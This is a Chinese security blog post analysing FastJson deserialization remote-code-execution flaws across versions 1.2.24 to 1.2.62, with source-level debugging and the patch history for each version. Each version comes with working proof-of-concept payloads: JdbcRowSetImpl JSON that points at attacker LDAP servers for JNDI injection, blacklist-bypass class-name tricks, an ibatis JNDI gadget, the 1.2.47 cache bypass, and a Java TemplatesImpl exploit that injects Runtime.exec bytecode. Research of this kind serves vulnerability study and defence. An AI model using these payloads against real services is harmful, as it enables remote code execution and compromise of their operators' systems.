<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="KaGty1" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      FastJson反序列化RCE分析 
      
      
      |
    
     KaGty1 &#39;s Personal Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/kagty1.jpg">
    <link rel="icon" href="/images/kagty1.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/kagty1.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">kagty1</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">FastJson反序列化RCE分析</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2025-01-21 10:53:33
        </span>
        
      </div>
      <div class="markdown-body">
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>影响版本：<code>fastjson &lt;= 1.2.24</code><br>描述：fastjson 默认使用 <code>@type</code> 指定反序列化任意类，攻击者可以通过在 Java 常见环境中寻找能够构造恶意类的方法，通过反序列化的过程中调用的 getter&#x2F;setter 方法，以及目标成员变量的注入来达到传参的目的，最终形成恶意调用链。此漏洞开启了 fastjson 反序列化漏洞的大门，为安全研究人员提供了新的思路。</p>
<p>fastjson &lt;&#x3D; 1.2.24 存在两条利用链：</p>
<p>(1) jdbcRowSetImpl - JNDI注入</p>
<p>(2) TemplatesImpl</p>
<h2 id="fastjson-反序列化时的一些规则"><a href="#fastjson-反序列化时的一些规则" class="headerlink" title="fastjson 反序列化时的一些规则"></a>fastjson 反序列化时的一些规则</h2><p>这里列举一些 fastjson 反序列化时对函数方法名和参数的一些要求：</p>
<ul>
<li>使用 <code>JSON.parse(jsonString)</code> 和 <code>JSON.parseObject(jsonString, Target.class)</code>，两者调用链一致，前者会在 jsonString 中解析字符串获取 <code>@type</code> 指定的类，后者则会直接使用参数中的 class。</li>
<li>fastjson 在创建一个类实例时会通过反射调用类中符合条件的 getter&#x2F;setter 方法，<ul>
<li>其中 getter 方法需满足条件：<ul>
<li>方法名长于 4</li>
<li>不是静态方法</li>
<li>以 <code>get</code> 开头且第 4 位是大写字母</li>
<li>方法不能有参数传入</li>
<li>继承自 <code>Collection|Map|AtomicBoolean|AtomicInteger|AtomicLong</code></li>
<li>此属性没有 setter 方法；</li>
</ul>
</li>
<li>setter 方法需满足条件：<ul>
<li>方法名长于 4</li>
<li>以 <code>set</code> 开头且第 4 位是大写字母</li>
<li>非静态方法</li>
<li>返回类型为 void 或当前类</li>
<li>参数个数为 1 个。<br>具体逻辑在 <code>com.alibaba.fastjson.util.JavaBeanInfo.build()</code> 中。</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="FastJson"><a href="#FastJson" class="headerlink" title="FastJson &lt;&#x3D; 1.2.24"></a>FastJson &lt;&#x3D; 1.2.24</h2><h3 id="jdbcRowSetImpl链"><a href="#jdbcRowSetImpl链" class="headerlink" title="jdbcRowSetImpl链"></a>jdbcRowSetImpl链</h3><p>位置：com.sun.rowset.JdbcRowSetImpl#setAutoCommit</p>
<p>跟进 this.connect()方法：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113233126401.png" alt="image-20250113233126401"></p>
<p>this.connect()方法中使用了 lookup()方法:</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113233106135.png" alt="image-20250113233106135"></p>
<p>dataSourceName值可控，存在JNDI注入：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113233054064.png" alt="image-20250113233054064"></p>
<h4 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h4><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line"> <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;com.sun.rowset.JdbcRowSetImpl&quot;</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">&quot;dataSourceName&quot;</span><span class="punctuation">:</span><span class="string">&quot;ldap://192.168.43.95:8085/Command&quot;</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">&quot;autoCommit&quot;</span><span class="punctuation">:</span><span class="literal"><span class="keyword">true</span></span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113233038734.png" alt="image-20250113233038734"></p>
<h4 id="利用场景："><a href="#利用场景：" class="headerlink" title="利用场景："></a>利用场景：</h4><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">(<span class="number">1</span>) 使用 parseObeject()方法时：</span><br><span class="line"><span class="keyword">Object</span> <span class="keyword">object</span> = <span class="type">JSON</span>.parseObject(<span class="keyword">user</span>);</span><br><span class="line"><span class="keyword">Object</span> <span class="keyword">object</span> = <span class="type">JSON</span>.parseObject(<span class="keyword">user</span>, <span class="keyword">Object</span>.<span class="keyword">class</span>);</span><br><span class="line"></span><br><span class="line">(<span class="number">2</span>) 使用 parse()方法时：</span><br><span class="line"><span class="keyword">Object</span> <span class="keyword">object</span> = <span class="type">JSON</span>.parse(<span class="keyword">user</span>);</span><br></pre></td></tr></table></figure>

<p>其中 user输入用户可控。</p>
<h3 id="TemplatesImpl链-条件苛刻"><a href="#TemplatesImpl链-条件苛刻" class="headerlink" title="TemplatesImpl链(条件苛刻)"></a>TemplatesImpl链(条件苛刻)</h3><p>TemplatesImpl 起源 getter方法 getOutputProperties()，跟进 newTransformer()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112100733289.png" alt="image-20250112100733289"></p>
<p>继续跟进 getTransletInstance()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112101715039.png" alt="image-20250112101715039"></p>
<p>可以看到当 _class 的值为 null时会调用 defineTransletClasses()，跟进 defineTransletClasses()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112102115949.png" alt="image-20250112102115949"></p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112102556264.png" alt="image-20250112102556264"></p>
<p>1、想进入 try{}代码模块。_bytecodes字节码数组不可以为 null。</p>
<p>2、加载的类的父类必须是 <code>com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet</code>，<code>_transletIndex</code>默认值为 -1，若加载类父类不是 AbstractTranslet，就会报错。</p>
<p>符合条件的类加载完成后，在 getTransletInstance()中进行实例化，实例化时会执行 静态初始化块的代码，从而RCE。</p>
<h4 id="POC-参考-Y4er师傅"><a href="#POC-参考-Y4er师傅" class="headerlink" title="POC(参考 Y4er师傅)"></a>POC(参考 Y4er师傅)</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.xxxx.fastjson_demo.run;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSON;</span><br><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.parser.Feature;</span><br><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.parser.ParserConfig;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;</span><br><span class="line"><span class="keyword">import</span> javassist.ClassPool;</span><br><span class="line"><span class="keyword">import</span> javassist.CtClass;</span><br><span class="line"><span class="keyword">import</span> org.apache.tomcat.util.codec.binary.Base64;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JDK7u21</span> &#123;</span><br><span class="line">    <span class="comment">// 参考https://y4er.com/post/ysoserial-commonscollections-2/</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] getevilbyte() <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">ClassPool</span> <span class="variable">pool</span> <span class="operator">=</span> ClassPool.getDefault();</span><br><span class="line">        <span class="type">CtClass</span> <span class="variable">cc</span> <span class="operator">=</span> pool.get(test.class.getName());</span><br><span class="line">        <span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> <span class="string">&quot;java.lang.Runtime.getRuntime().exec(\&quot;open -a Calculator\&quot;);&quot;</span>;</span><br><span class="line">        cc.makeClassInitializer().insertBefore(cmd); <span class="comment">//将恶意代码添加至静态代码块中</span></span><br><span class="line">        <span class="type">String</span> <span class="variable">randomClassName</span> <span class="operator">=</span> <span class="string">&quot;XxxX&quot;</span> + System.nanoTime();</span><br><span class="line">        cc.setName(randomClassName);</span><br><span class="line">        cc.setSuperclass((pool.get(AbstractTranslet.class.getName())));</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> cc.toBytecode();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="comment">//main函数调用以下poc而已</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String args[])</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">byte</span>[] evilCode = getevilbyte();</span><br><span class="line">            <span class="type">String</span> <span class="variable">evilCode_base64</span> <span class="operator">=</span> Base64.encodeBase64String(evilCode);</span><br><span class="line">            <span class="keyword">final</span> <span class="type">String</span> <span class="variable">NASTY_CLASS</span> <span class="operator">=</span> <span class="string">&quot;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&quot;</span>;</span><br><span class="line">            <span class="type">String</span> <span class="variable">text1</span> <span class="operator">=</span> <span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;&quot;</span> + NASTY_CLASS + <span class="string">&quot;\&quot;,\&quot;_bytecodes\&quot;:[\&quot;&quot;</span> + evilCode_base64 + <span class="string">&quot;\&quot;],&#x27;_name&#x27;:&#x27;asd&#x27;,&#x27;_tfactory&#x27;:&#123; &#125;,\&quot;_outputProperties\&quot;:&#123; &#125;,&quot;</span> + <span class="string">&quot;\&quot;_version\&quot;:\&quot;1.0\&quot;,\&quot;allowedProtocols\&quot;:\&quot;all\&quot;&#125;\n&quot;</span>;</span><br><span class="line">            System.out.println(text1);</span><br><span class="line">            <span class="type">ParserConfig</span> <span class="variable">config</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ParserConfig</span>();</span><br><span class="line">            <span class="type">Object</span> <span class="variable">obj</span> <span class="operator">=</span> JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);</span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">class</span> <span class="title class_">test</span> &#123;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h2 id="1-2-25"><a href="#1-2-25" class="headerlink" title="1.2.25 &lt;&#x3D; FastJson &lt;&#x3D; 1.2.41"></a>1.2.25 &lt;&#x3D; FastJson &lt;&#x3D; 1.2.41</h2><p>使用 jdbc链时报错：autoType is not support. com.sun.rowset.jdbcRowSetImpl</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112105301636.png" alt="image-20250112105301636"></p>
<p>FastJson 在 1.2.25 ~ 1.2.41 版本中增加了 checkAutoType()，在获取 @type的值时对其进行检测：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112110032572.png" alt="image-20250112110032572"></p>
<p>跟进 <code>com.alibaba.fastjson.parser.ParserConfig#checkAutoType</code></p>
<p>autoTypeSupport 值默认为 false，使用黑白名单进行验证，若将 autoTypeSupport机制开启，即 autoTypeSupport &#x3D; true，即可无需白名单检测通过，也可以加载类：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112111304931.png" alt="image-20250112111304931"></p>
<p>但依然要绕过黑名单检测：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112111411301.png" alt="image-20250112111411301"></p>
<p>可以使用 loadClass()的特殊字符去除机制进行绕过(逻辑漏洞)：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112111720621.png" alt="image-20250112111720621"></p>
<p>类名开头为<code>[</code>会在类加载时去除，以 <code>L</code>开头<code>;</code>结尾也会在类加载时去除。</p>
<h4 id="POC-1"><a href="#POC-1" class="headerlink" title="POC"></a>POC</h4><p>1、首先显示的开启 autoTypeSupport机制：</p>
<p><code>ParserConfig.getGlobalInstance().setAutoTypeSupport(true);</code></p>
<p>2、特殊字符绕过黑名单检测：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line"> <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;Lcom.sun.rowset.JdbcRowSetImpl;&quot;</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">&quot;dataSourceName&quot;</span><span class="punctuation">:</span><span class="string">&quot;ldap://192.168.43.95:8085/Command&quot;</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">&quot;autoCommit&quot;</span><span class="punctuation">:</span><span class="literal"><span class="keyword">true</span></span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112113038170.png" alt="image-20250112113038170"></p>
<p>注：黑名单绕过是基于<code>ParserConfig.getGlobalInstance().setAutoTypeSupport(true);</code>的基础之上的。</p>
<h2 id="FastJson-1-2-42"><a href="#FastJson-1-2-42" class="headerlink" title="FastJson 1.2.42"></a>FastJson 1.2.42</h2><p>1.2.42 版本中的黑名单采用了 hash值的形式。</p>
<p>并且对传入的类进行了特殊字符处理，对开头的 L 和结尾的 ; 进行了一次去除，并重新将删除后的结果赋值className。但 loadClass()进行的是递归处理，所以可以双写绕过：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112121613120.png" alt="image-20250112121613120"></p>
<h4 id="POC-2"><a href="#POC-2" class="headerlink" title="POC"></a>POC</h4><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line"> <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;LLcom.sun.rowset.JdbcRowSetImpl;;&quot;</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">&quot;dataSourceName&quot;</span><span class="punctuation">:</span><span class="string">&quot;ldap://192.168.43.95:8085/Command&quot;</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">&quot;autoCommit&quot;</span><span class="punctuation">:</span><span class="literal"><span class="keyword">true</span></span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>



<h2 id="FastJson-1-2-43"><a href="#FastJson-1-2-43" class="headerlink" title="FastJson 1.2.43"></a>FastJson 1.2.43</h2><p>修复双写绕过，若出现两个 L字符开头则直接抛出异常：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112123349780.png" alt="image-20250112123349780"></p>
<p>但是 <code>[</code> 可以正常使用，使用 <code>[</code>绕过即可。</p>
<h4 id="POC-3"><a href="#POC-3" class="headerlink" title="POC"></a>POC</h4><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line"> <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;[com.sun.rowset.JdbcRowSetImpl&quot;</span><span class="punctuation">[</span><span class="punctuation">,</span></span><br><span class="line"> <span class="punctuation">&#123;</span><span class="attr">&quot;dataSourceName&quot;</span><span class="punctuation">:</span><span class="string">&quot;ldap://192.168.43.95:8085/Command&quot;</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">&quot;autoCommit&quot;</span><span class="punctuation">:</span><span class="literal"><span class="keyword">true</span></span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>



<h2 id="FastJson-1-2-44"><a href="#FastJson-1-2-44" class="headerlink" title="FastJson 1.2.44"></a>FastJson 1.2.44</h2><p>修复了 1.2.43中 <code>[</code>字符绕过的问题。</p>
<h2 id="FastJson-1-2-45"><a href="#FastJson-1-2-45" class="headerlink" title="FastJson 1.2.45"></a>FastJson 1.2.45</h2><p>黑名单绕过。</p>
<h4 id="POC-4"><a href="#POC-4" class="headerlink" title="POC"></a>POC</h4><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;org.apache.ibatis.datasource.jndi.JndiDataSourceFactory&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;properties&quot;</span><span class="punctuation">:</span><span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;data_source&quot;</span><span class="punctuation">:</span><span class="string">&quot;ldap://127.0.0.1:23457/Command8&quot;</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//需要有第三方组件ibatis-core 3:0</span></span><br></pre></td></tr></table></figure>



<h2 id="FastJson-1-2-47-重要"><a href="#FastJson-1-2-47-重要" class="headerlink" title="FastJson 1.2.47 (重要)"></a>FastJson 1.2.47 (重要)</h2><h4 id="POC-5"><a href="#POC-5" class="headerlink" title="POC"></a>POC</h4><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;a&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;java.lang.Class&quot;</span><span class="punctuation">,</span> </span><br><span class="line">        <span class="attr">&quot;val&quot;</span><span class="punctuation">:</span> <span class="string">&quot;com.sun.rowset.JdbcRowSetImpl&quot;</span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span> </span><br><span class="line">    <span class="attr">&quot;b&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;com.sun.rowset.JdbcRowSetImpl&quot;</span><span class="punctuation">,</span> </span><br><span class="line">        <span class="attr">&quot;dataSourceName&quot;</span><span class="punctuation">:</span> <span class="string">&quot;ldap://localhost:1389/Exploit&quot;</span><span class="punctuation">,</span> </span><br><span class="line">        <span class="attr">&quot;autoCommit&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>FastJson 1.2.47 是最为严重的一个漏洞。可以在不开启 autoTypeSupport的条件下实现RCE。</p>
<p><code>com.alibaba.fastjson.util.TypeUtils</code>的静态代码块初始化调用 <code>com.alibaba.fastjson.util.TypeUtils#addBaseClassMappings</code> 将常用的类通过 loadClass()放到 mappings中：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112145116554.png" alt="image-20250112145116554"></p>
<p>使用 POC进行调试：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Test</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> <span class="string">&quot;&#123;\n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;    \&quot;a\&quot;: &#123;\n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;        \&quot;@type\&quot;: \&quot;java.lang.Class\&quot;, \n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;        \&quot;val\&quot;: \&quot;com.sun.rowset.JdbcRowSetImpl\&quot;\n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;    &#125;, \n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;    \&quot;b\&quot;: &#123;\n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;        \&quot;@type\&quot;: \&quot;com.sun.rowset.JdbcRowSetImpl\&quot;, \n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;        \&quot;dataSourceName\&quot;: \&quot;ldap://192.168.43.95:8085/attack\&quot;, \n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;        \&quot;autoCommit\&quot;: true\n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;    &#125;\n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;&#125;\n&quot;</span>;</span><br><span class="line">        <span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> JSON.parseObject(s, Object.class);  <span class="comment">//此处打断点</span></span><br><span class="line">        System.out.println(o);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>继续跟进到 checkAutoType()中，代码使用 Mapping 和使用 deserializers.findClass() 查找 Java.lang.Class：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112150824237.png" alt="image-20250112150824237"></p>
<p>找到后赋值给 clazz：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112150923936.png" alt="image-20250112150923936"></p>
<p>clazz有值后，直接返回了，无需经过黑白名单检测：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112151129057.png" alt="image-20250112151129057"></p>
<p>从 checkAutoType()出来后，跟进 deserialize()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112151512724.png" alt="image-20250112151512724"></p>
<p>Parser.parse()获取到 objVal的值：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112151751164.png" alt="image-20250112151751164"></p>
<p>进而赋值给 strVal:</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112151819395.png" alt="image-20250112151819395"></p>
<p>经过一系列 if判断，因为 clazz 为 java.lang.Class &#x3D;&#x3D; Class.class，所以 strVal作为参数被 TypeUtils.loadClass()调用，跟进 TypeUtils.loadClass()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112152134181-20250113232737296.png" alt="image-20250112152134181"></p>
<p>继续跟进 loadClass()，可以看到 cache参数默认为 true：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112152638360.png" alt="image-20250112152638360"></p>
<p>将 <code>com.sun.rowset.JdbcRowSetImpl</code>类加入到了 mapping中。这样在解析第二组键值对时，可以在 mapping中找到 JdbcRowSetImpl类从而直接 return class，无需黑白名单检测，实现RCE。</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112153221243.png" alt="image-20250112153221243"></p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112153304150.png" alt="image-20250112153304150"></p>
<h2 id="FastJson-1-2-48"><a href="#FastJson-1-2-48" class="headerlink" title="FastJson 1.2.48"></a>FastJson 1.2.48</h2><p>针对 1.2.47进行了修复，将 cache的默认值从 true修改为了 false：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112154203318.png" alt="image-20250112154203318"></p>
<h2 id="FastJson-1-2-62"><a href="#FastJson-1-2-62" class="headerlink" title="FastJson 1.2.62"></a>FastJson 1.2.62</h2><p>前提：autoTypeSupport 为 true</p>
